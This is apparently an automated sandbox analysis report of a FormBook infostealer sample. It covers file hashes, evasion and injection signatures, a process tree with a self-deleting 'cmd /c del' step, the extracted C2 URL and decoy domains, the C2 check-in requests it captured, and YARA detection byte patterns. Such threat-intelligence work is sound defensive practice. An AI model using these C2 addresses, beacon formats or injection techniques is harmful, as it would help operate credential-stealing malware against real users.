
Windows Analysis Report NvkGETsSDb.exe

Overview

General Information

Sample Name: NvkGETsSDb.exe
Analysis ID: 510425
MD5: e17b528f9c192653dc9777bd46e48d82
SHA1: f4dfc93942ed0c091340057f1164b1e1e6f4a148
SHA256: 83708560ecc442b5b6dadbdf5af39ae4f1e843664c932a9de3eff1e38bf6d4a5
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • NvkGETsSDb.exe (PID: 2500 cmdline: 'C:\Users\user\Desktop\NvkGETsSDb.exe' MD5: E17B528F9C192653DC9777BD46E48D82)
    • NvkGETsSDb.exe (PID: 3092 cmdline: C:\Users\user\Desktop\NvkGETsSDb.exe MD5: E17B528F9C192653DC9777BD46E48D82)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6236 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6268 cmdline: /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      2.2.NvkGETsSDb.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.2.NvkGETsSDb.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.NvkGETsSDb.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.NvkGETsSDb.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.NvkGETsSDb.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview


          AV Detection:

          Found malware configuration
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: NvkGETsSDb.exe, Virustotal: Detection: 15%
          Yara detected FormBook
          Source: Yara match, File source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORY
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: NvkGETsSDb.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: NvkGETsSDb.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe, Code function: 4x nop then pop esi, 2_2_00417326
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe, Code function: 4x nop then pop edi, 2_2_00417DA8
          Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop esi, 16_2_00167326
          Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, 16_2_00167DA8

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 184.168.131.241:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 184.168.131.241:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 184.168.131.241:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe, Domain query: www.carterscts.com
          Source: C:\Windows\explorer.exe, Domain query: www.lenovoidc.com
          Source: C:\Windows\explorer.exe, Domain query: www.mr-exclusive.com
          Source: C:\Windows\explorer.exe, Network Connect: 198.46.90.29 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.agentpathleurre.space/s18y/
          Source: Joe Sandbox View, ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox View, ASN Name: INMOTI-1US INMOTI-1US
          Source: global traffic, HTTP traffic detected: GET /s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv HTTP/1.1 | Host: www.carterscts.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv HTTP/1.1 | Host: www.mr-exclusive.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View, IP Address: 184.168.131.241 184.168.131.241
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.21.3 | Date: Wed, 27 Oct 2021 17:37:28 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 236 | Connection: close | Vary: Accept-Encoding | Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp, String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: ipconfig.exe, 00000010.00000002.519067627.000000000358F000.00000004.00020000.sdmp, String found in binary or memory: https://www.afternic.com/forsale/mr-exclusive.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_
          Source: unknown, DNS traffic detected: queries for: www.carterscts.com

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: NvkGETsSDb.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
